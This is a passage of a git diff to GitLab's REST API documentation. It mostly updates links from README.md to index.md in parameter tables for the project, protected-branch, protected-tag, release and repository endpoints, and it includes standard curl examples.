[URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `membership` | boolean | **{dotted-circle}** No | Limit by projects that the current user is a member of. | | `min_access_level` | integer | **{dotted-circle}** No | Limit by current user minimal [access level](members.md#valid-access-levels). | | `order_by` | string | **{dotted-circle}** No | Return projects ordered by `id`, `name`, `path`, `created_at`, `updated_at`, or `last_activity_at` fields. Default is `created_at`. | @@ -1426,7 +1428,7 @@ GET /projects/:id/forks | `simple` | boolean | **{dotted-circle}** No | Return only limited fields for each project. This is a no-op without authentication as then _only_ simple fields are returned. | | `sort` | string | **{dotted-circle}** No | Return projects sorted in `asc` or `desc` order. Default is `desc`. | | `starred` | boolean | **{dotted-circle}** No | Limit by projects starred by the current user. | -| `statistics` | boolean | **{dotted-circle}** No | Include project statistics. | +| `statistics` | boolean | **{dotted-circle}** No | Include project statistics. Only available to Reporter or higher level role members. | | `visibility` | string | **{dotted-circle}** No | Limit by visibility `public`, `internal`, or `private`. | | `with_custom_attributes` | boolean | **{dotted-circle}** No | Include [custom attributes](custom_attributes.md) in response. _(admins only)_ | | `with_issues_enabled` | boolean | **{dotted-circle}** No | Limit by enabled issues feature. | @@ -1523,7 +1525,7 @@ POST /projects/:id/star | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ```shell curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/star" @@ -1621,7 +1623,7 @@ POST /projects/:id/unstar | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ```shell curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/unstar" @@ -1719,7 +1721,7 @@ GET /projects/:id/starrers | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `search` | string | **{dotted-circle}** No | Search for specific users. | ```shell @@ -1765,7 +1767,7 @@ GET /projects/:id/languages | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/languages" @@ -1794,7 +1796,7 @@ POST /projects/:id/archive | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ```shell curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/archive" @@ -1913,7 +1915,7 @@ POST /projects/:id/unarchive | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ```shell curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/unarchive" @@ -2044,7 +2046,7 @@ DELETE /projects/:id | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ## Restore project marked for deletion **(PREMIUM)** @@ -2058,7 +2060,7 @@ POST /projects/:id/restore | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ## Upload a file @@ -2073,7 +2075,7 @@ POST /projects/:id/uploads | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| | `file` | string | **{check-circle}** Yes | The file to be uploaded. | -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | To upload a file from your file system, use the `--form` argument. This causes cURL to post data using the header `Content-Type: multipart/form-data`. The @@ -2147,7 +2149,7 @@ PUT /projects/:id | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| | `avatar` | string | **{check-circle}** Yes | The file to be uploaded. | -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | To upload an avatar from your file system, use the `--form` argument. This causes cURL to post data using the header `Content-Type: multipart/form-data`. The @@ -2182,7 +2184,7 @@ POST /projects/:id/share | `expires_at` | string | **{dotted-circle}** No | Share expiration date in ISO 8601 format: 2016-09-26 | | `group_access` | integer | **{check-circle}** Yes | The [access level](members.md#valid-access-levels) to grant the group. | | `group_id` | integer | **{check-circle}** Yes | The ID of the group to share with. | -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ## Delete a shared project link within a group @@ -2195,7 +2197,7 @@ DELETE /projects/:id/share/:group_id | Attribute | Type | Required | Description | |------------|----------------|------------------------|-------------| | `group_id` | integer | **{check-circle}** Yes | The ID of the group. | -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ```shell curl --request DELETE --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/share/17" @@ -2216,7 +2218,7 @@ GET /projects/:id/hooks | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ### Get project hook @@ -2229,7 +2231,7 @@ GET /projects/:id/hooks/:hook_id | Attribute | Type | Required | Description | |-----------|----------------|------------------------|---------------------------| | `hook_id` | integer | **{check-circle}** Yes | The ID of a project hook. | -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ```json { @@ -2268,7 +2270,7 @@ POST /projects/:id/hooks | `confidential_note_events` | boolean | **{dotted-circle}** No | Trigger hook on confidential note events. | | `deployment_events` | boolean | **{dotted-circle}** No | Trigger hook on deployment events. | | `enable_ssl_verification` | boolean | **{dotted-circle}** No | Do SSL verification when triggering the hook. | -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `issues_events` | boolean | **{dotted-circle}** No | Trigger hook on issues events. | | `job_events` | boolean | **{dotted-circle}** No | Trigger hook on job events. | | `merge_requests_events` | boolean | **{dotted-circle}** No | Trigger hook on merge requests events. | @@ -2296,7 +2298,7 @@ PUT /projects/:id/hooks/:hook_id | `deployment_events` | boolean | **{dotted-circle}** No | Trigger hook on deployment events. | | `enable_ssl_verification` | boolean | **{dotted-circle}** No | Do SSL verification when triggering the hook. | | `hook_id` | integer | **{check-circle}** Yes | The ID of the project hook. | -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `issues_events` | boolean | **{dotted-circle}** No | Trigger hook on issues events. | | `job_events` | boolean | **{dotted-circle}** No | Trigger hook on job events. | | `merge_requests_events` | boolean | **{dotted-circle}** No | Trigger hook on merge requests events. | @@ -2322,7 +2324,7 @@ DELETE /projects/:id/hooks/:hook_id | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| | `hook_id` | integer | **{check-circle}** Yes | The ID of the project hook. | -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | Note the JSON response differs if the hook is available or not. If the project hook is available before it's returned in the JSON response or an empty response @@ -2342,7 +2344,7 @@ POST /projects/:id/fork/:forked_from_id | Attribute | Type | Required | Description | |------------------|----------------|------------------------|-------------| | `forked_from_id` | ID | **{check-circle}** Yes | The ID of the project that was forked from. | -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ### Delete an existing forked from relationship @@ -2352,7 +2354,7 @@ DELETE /projects/:id/fork | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ## Search for projects by name @@ -2382,7 +2384,7 @@ POST /projects/:id/housekeeping | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ## Push Rules **(PREMIUM)** @@ -2397,7 +2399,7 @@ GET /projects/:id/push_rule | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | ```json { @@ -2449,7 +2451,7 @@ POST /projects/:id/push_rule | `commit_message_regex` | string | **{dotted-circle}** No | All commit messages must match this, for example `Fixed \d+\..*`. | | `deny_delete_tag` | boolean | **{dotted-circle}** No | Deny deleting a tag. | | `file_name_regex` | string | **{dotted-circle}** No | All committed filenames must **not** match this, for example `(jar|exe)$`. | -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding), | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding), | | `max_file_size` | integer | **{dotted-circle}** No | Maximum file size (MB). | | `member_check` | boolean | **{dotted-circle}** No | Restrict commits by author (email) to existing GitLab users. | | `prevent_secrets` | boolean | **{dotted-circle}** No | GitLab rejects any files that are likely to contain secrets. | @@ -2472,7 +2474,7 @@ PUT /projects/:id/push_rule | `commit_message_regex` | string | **{dotted-circle}** No | All commit messages must match this, for example `Fixed \d+\..*`. | | `deny_delete_tag` | boolean | **{dotted-circle}** No | Deny deleting a tag. | | `file_name_regex` | string | **{dotted-circle}** No | All committed filenames must **not** match this, for example `(jar|exe)$`. | -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `max_file_size` | integer | **{dotted-circle}** No | Maximum file size (MB). | | `member_check` | boolean | **{dotted-circle}** No | Restrict commits by author (email) to existing GitLab users. | | `prevent_secrets` | boolean | **{dotted-circle}** No | GitLab rejects any files that are likely to contain secrets. | @@ -2491,7 +2493,7 @@ DELETE /projects/:id/push_rule | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ## Transfer a project to a new namespace @@ -2503,7 +2505,7 @@ PUT /projects/:id/transfer | Attribute | Type | Required | Description | |-------------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `namespace` | integer or string | **{check-circle}** Yes | The ID or path of the namespace to transfer to project to. | Example request: @@ -2653,7 +2655,7 @@ POST /projects/:id/mirror/pull | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ```shell curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/:id/mirror/pull" @@ -2682,7 +2684,7 @@ GET /projects/:id/snapshot | Attribute | Type | Required | Description | |-----------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `wiki` | boolean | **{dotted-circle}** No | Whether to download the wiki, rather than project, repository. | ## Get the path to repository storage @@ -2697,7 +2699,7 @@ GET /projects/:id/storage | Attribute | Type | Required | Description | |--------------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | ```json [ diff --git a/doc/api/protected_branches.md b/doc/api/protected_branches.md index 2fe821a7758..a75090c90d5 100644 --- a/doc/api/protected_branches.md +++ b/doc/api/protected_branches.md @@ -30,7 +30,7 @@ GET /projects/:id/protected_branches | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `search` | string | no | Name or part of the name of protected branches to be searched for | ```shell @@ -124,7 +124,7 @@ GET /projects/:id/protected_branches/:name | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the branch or wildcard | ```shell @@ -199,7 +199,7 @@ curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitla | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the branch or wildcard | | `push_access_level` | string | no | Access levels allowed to push (defaults: `40`, Maintainer role) | | `merge_access_level` | string | no | Access levels allowed to merge (defaults: `40`, Maintainer role) | @@ -280,7 +280,7 @@ Example response: ### Example with user / group level access **(PREMIUM)** Elements in the `allowed_to_push` / `allowed_to_merge` / `allowed_to_unprotect` array should take the -form `{user_id: integer}`, `{group_id: integer}` or `{access_level: integer}`. Each user must have access to the project and each group must [have this project shared](../user/project/members/share_project_with_groups.md). These access levels allow [more granular control over protected branch access](../user/project/protected_branches.md#restricting-push-and-merge-access-to-certain-users) and were [added to the API](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/3516) in GitLab 10.3 EE. +form `{user_id: integer}`, `{group_id: integer}`, or `{access_level: integer}`. Each user must have access to the project and each group must [have this project shared](../user/project/members/share_project_with_groups.md). These access levels allow [more granular control over protected branch access](../user/project/protected_branches.md). ```shell curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/protected_branches?name=*-stable&allowed_to_push%5B%5D%5Buser_id%5D=1" @@ -399,7 +399,7 @@ curl --request DELETE --header "PRIVATE-TOKEN: <your_access_token>" "https://git | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the branch | ## Require code owner approvals for a single branch @@ -416,6 +416,6 @@ curl --request PATCH --header "PRIVATE-TOKEN: <your_access_token>" "https://gitl | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the branch | | `code_owner_approval_required` | boolean | no | **(PREMIUM)** Prevent pushes to this branch if it matches an item in the [`CODEOWNERS` file](../user/project/code_owners.md). (defaults: false)| diff --git a/doc/api/protected_environments.md b/doc/api/protected_environments.md index 52fcdad1ad6..9a64e676ad9 100644 --- a/doc/api/protected_environments.md +++ b/doc/api/protected_environments.md @@ -30,7 +30,7 @@ GET /projects/:id/protected_environments | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/protected_environments/" @@ -64,7 +64,7 @@ GET /projects/:id/protected_environments/:name | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the protected environment | ```shell @@ -104,7 +104,7 @@ curl --header 'Content-Type: application/json' --request POST \ | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `name` | string | yes | The name of the environment. | | `deploy_access_levels` | array | yes | Array of access levels allowed to deploy, with each described by a hash. | @@ -143,5 +143,5 @@ curl --request DELETE --header "PRIVATE-TOKEN: <your_access_token>" "https://git | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `name` | string | yes | The name of the protected environment. | diff --git a/doc/api/protected_tags.md b/doc/api/protected_tags.md index e04f418258d..7a46a2dbf12 100644 --- a/doc/api/protected_tags.md +++ b/doc/api/protected_tags.md @@ -30,7 +30,7 @@ GET /projects/:id/protected_tags | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/protected_tags" @@ -64,7 +64,7 @@ GET /projects/:id/protected_tags/:name | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the tag or wildcard | ```shell @@ -100,7 +100,7 @@ curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitla | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the tag or wildcard | | `create_access_level` | string | no | Access levels allowed to create (defaults: `40`, Maintainer role) | @@ -132,5 +132,5 @@ curl --request DELETE --header "PRIVATE-TOKEN: <your_access_token>" "https://git | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the tag | diff --git a/doc/api/releases/index.md b/doc/api/releases/index.md index 0cbf613c598..cb688b81336 100644 --- a/doc/api/releases/index.md +++ b/doc/api/releases/index.md @@ -12,6 +12,8 @@ info: To determine the technical writer assigned to the Stage/Group associated w > - Release Evidences were [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/26019) in GitLab 12.5. > - `description_html` became an opt-in field [with GitLab 13.12 for performance reasons](https://gitlab.com/gitlab-org/gitlab/-/issues/299447). Please pass the `include_html_description` query string parameter if you need it. +> - [The permission model for create, update and delete actions was fixed](https://gitlab.com/gitlab-org/gitlab/-/issues/327505) in GitLab 14.1. + See [Release permissions](../../user/project/releases/index.md#release-permissions) for more information. ## List Releases @@ -23,7 +25,7 @@ GET /projects/:id/releases | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | ----------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding). | | `order_by` | string | no | The field to use as order. Either `released_at` (default) or `created_at`. | | `sort` | string | no | The direction of the order. Either `desc` (default) for descending order or `asc` for ascending order. | | `include_html_description` | boolean | no | If `true`, a response includes HTML rendered Markdown of the release description. | @@ -228,7 +230,7 @@ GET /projects/:id/releases/:tag_name | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | ----------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding). | | `tag_name` | string | yes | The Git tag the release is associated with. | | `include_html_description` | boolean | no | If `true`, a response includes HTML rendered Markdown of the release description. | @@ -359,7 +361,7 @@ POST /projects/:id/releases | Attribute | Type | Required | Description | | -------------------| --------------- | -------- | -------------------------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding). | | `name` | string | no | The release name. | | `tag_name` | string | yes | The tag where the release is created from. | | `description` | string | no | The description of the release. You can use [Markdown](../../user/markdown.md). | @@ -507,7 +509,7 @@ POST /projects/:id/releases/:tag_name/evidence | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | ----------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding). | | `tag_name` | string | yes | The Git tag the release is associated with. | Example request: @@ -532,7 +534,7 @@ PUT /projects/:id/releases/:tag_name | Attribute | Type | Required | Description | | ------------- | --------------- | -------- | ----------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding). | | `tag_name` | string | yes | The Git tag the release is associated with. | | `name` | string | no | The release name. | | `description` | string | no | The description of the release. You can use [Markdown](../../user/markdown.md). | @@ -639,7 +641,7 @@ DELETE /projects/:id/releases/:tag_name | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | ----------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding). | | `tag_name` | string | yes | The Git tag the release is associated with. | Example request: diff --git a/doc/api/releases/links.md b/doc/api/releases/links.md index f4a2df5558f..2f8dc363124 100644 --- a/doc/api/releases/links.md +++ b/doc/api/releases/links.md @@ -21,7 +21,7 @@ GET /projects/:id/releases/:tag_name/assets/links | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | --------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding). | | `tag_name` | string | yes | The tag associated with the Release. | Example request: @@ -61,7 +61,7 @@ GET /projects/:id/releases/:tag_name/assets/links/:link_id | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | --------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding). | | `tag_name` | string | yes | The tag associated with the Release. | | `link_id` | integer | yes | The ID of the link. | @@ -93,7 +93,7 @@ POST /projects/:id/releases/:tag_name/assets/links | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | ---------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding). | | `tag_name` | string | yes | The tag associated with the Release. | | `name` | string | yes | The name of the link. Link names must be unique within the release. | | `url` | string | yes | The URL of the link. Link URLs must be unique within the release. | @@ -134,7 +134,7 @@ PUT /projects/:id/releases/:tag_name/assets/links/:link_id | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | --------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding). | | `tag_name` | string | yes | The tag associated with the Release. | | `link_id` | integer | yes | The ID of the link. | | `name` | string | no | The name of the link. | @@ -175,7 +175,7 @@ DELETE /projects/:id/releases/:tag_name/assets/links/:link_id | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | --------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding). | | `tag_name` | string | yes | The tag associated with the Release. | | `link_id` | integer | yes | The ID of the link. | diff --git a/doc/api/remote_mirrors.md b/doc/api/remote_mirrors.md index 5e5b44fec8a..799763a7da3 100644 --- a/doc/api/remote_mirrors.md +++ b/doc/api/remote_mirrors.md @@ -7,7 +7,7 @@ type: reference, api # Project remote mirrors API **(FREE)** -[Push mirrors](../user/project/repository/repository_mirroring.md#pushing-to-a-remote-repository) +[Push mirrors](../user/project/repository/repository_mirroring.md#push-to-a-remote-repository) defined on a project's repository settings are called "remote mirrors", and the state of these mirrors can be queried and modified via the remote mirror API outlined below. diff --git a/doc/api/repositories.md b/doc/api/repositories.md index 1868f33373c..7e50a2c9f4c 100644 --- a/doc/api/repositories.md +++ b/doc/api/repositories.md @@ -22,11 +22,11 @@ Supported attributes: | Attribute | Type | Required | Description | | :---------- | :------------- | :------- | :---------- | -| `id` | integer/string | no | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | no | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `path` | string | yes | The path inside repository. Used to get content of subdirectories. | | `ref` | string | yes | The name of a repository branch or tag or if not given the default branch. | | `recursive` | boolean | yes | Boolean value used to get a recursive tree (false by default). | -| `per_page` | integer | yes | Number of results to show per page. If not specified, defaults to `20`. [Learn more on pagination](README.md#pagination). | +| `per_page` | integer | yes | Number of results to show per page. If not specified, defaults to `20`. [Learn more on pagination](index.md#pagination). | ```json [ @@ -96,7 +96,7 @@ Supported attributes: | Attribute | Type | Required | 